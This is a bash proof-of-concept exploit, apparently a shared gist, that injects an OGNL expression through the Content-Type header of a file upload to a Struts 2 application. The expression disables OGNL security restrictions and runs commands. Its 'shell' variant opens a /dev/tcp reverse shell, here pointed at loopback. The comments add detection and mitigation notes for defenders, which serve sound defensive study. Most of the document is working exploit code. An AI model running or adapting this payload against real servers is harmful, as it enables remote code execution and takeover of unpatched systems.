
@SylvainJuge
Created June 7, 2018 09:35
#!/bin/bash
# Lab proof-of-concept: sends one multipart upload to a local test instance
# (http://localhost:8080/file-upload/upload.action) with an OGNL expression in
# the Content-Type header where a media type belongs. The class names used in
# the header (com.opensymphony.xwork2.*, ognl.OgnlContext) suggest the target
# is an XWork/Struts 2 application; the script names no advisory or version.
#
# Usage: <script> [hello|shell|xeyes]   (default: hello)
#
# Defender notes:
#   - Network detection: a legitimate upload sends
#     "multipart/form-data; boundary=...". A Content-Type that begins with
#     "%{" or contains "_memberAccess", "ognl.OgnlContext" or
#     "java.lang.ProcessBuilder" is a strong signal in proxy/WAF/access logs.
#   - Host detection: the non-default variants reference ProcessBuilder with
#     /bin/bash or /bin/sh, so a shell whose parent is the application
#     server's JVM (or a socket opened by such a shell) is worth alerting on.
#   - Mitigation: keep the framework on a release carrying the vendor fix for
#     this class of bug, and reject requests whose Content-Type is not a
#     syntactically valid media type before they reach the application.
#     NOTE(review): affected/fixed versions are not stated here; confirm
#     against the vendor advisory.

# Abort on any failed command, unset variable, or failed pipeline stage.
set -euo pipefail
# Default variant ('hello'): an OGNL static call to System.out.println, so the
# marker text is written to the server process's stdout. Used as a canary.
payload="(@java.lang.System@out.println('\\n\\n\\n---[ hello Sqreeners ]---'))"
# First positional argument selects the variant; defaults to 'hello'.
attack=${1:-hello}
# 'shell' variant: replaces the payload with an expression that builds a
# ProcessBuilder for /bin/bash, merges stderr into stdout and starts it.
# Address and port are both hard-coded to loopback (127.0.0.1:9999), so as
# written this only concerns a listener on the same lab machine.
if [[ 'shell' == "${attack}" ]]; then
remote_shell_ip=127.0.0.1
remote_shell_port=9999
payload="\
(#cmd={'/bin/bash', '-c', 'exec 5<>/dev/tcp/${remote_shell_ip}/${remote_shell_port};cat <&5 | while read line; do \$line 2>&5 >&5; done'})\
.(#p=new java.lang.ProcessBuilder(#cmd))\
.(#p.redirectErrorStream(true))\
.(#p.start())\
"
fi
# 'xeyes' variant: replaces the payload with an expression that references a
# ProcessBuilder for `xeyes`, a harmless X11 program used as a visible marker.
if [[ 'xeyes' == "${attack}" ]]; then
payload="(#p=new java.lang.ProcessBuilder('/bin/sh','-c','xeyes')"
fi
# ------------ common stuff ------------
# Wrapper shared by every variant. It evaluates to 'multipart/form-data'
# first, then either assigns OgnlContext.DEFAULT_MEMBER_ACCESS to
# #_memberAccess or, when that is not set, fetches OgnlUtil from the container,
# clears its excluded package/class lists and sets member access on the
# context. Only then is ${payload} appended. These steps switch off the
# framework's OGNL restrictions, which is why the strings listed in the
# defender notes are dependable indicators.
header="\
%{\
('multipart/form-data')\
.(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)\
.(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])\
.(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))\
.(#ognlUtil.getExcludedPackageNames().clear())\
.(#ognlUtil.getExcludedClasses().clear())\
.(#context.setMemberAccess(#dm))))\
.${payload}\
}\
"
# Commented-out alternative: the same "%{...}" wrapper with no member-access
# changes and no payload.
#header="%{('multipart/form-data')}"
# Two empty temporary files serve as the upload parts.
# NOTE(review): tempfile(1) is a debianutils tool deprecated in favour of
# mktemp(1); the expansions below are unquoted; and because of `set -e` a
# failing curl ends the script before the rm calls run (there is no trap),
# leaving both files behind.
file1=$(tempfile)
file2=$(tempfile)
# we have to upload multiple files
# -v prints the request/response headers to stderr, -s hides the progress
# meter, -o /dev/null discards the response body. The target URL is fixed to
# localhost:8080.
curl http://localhost:8080/file-upload/upload.action \
-F upload=@${file1} \
-F upload=@${file2} \
-v \
-s \
-H "Content-type: ${header}" \
-o /dev/null
# Remove the temporary upload files.
rm ${file1}
rm ${file2}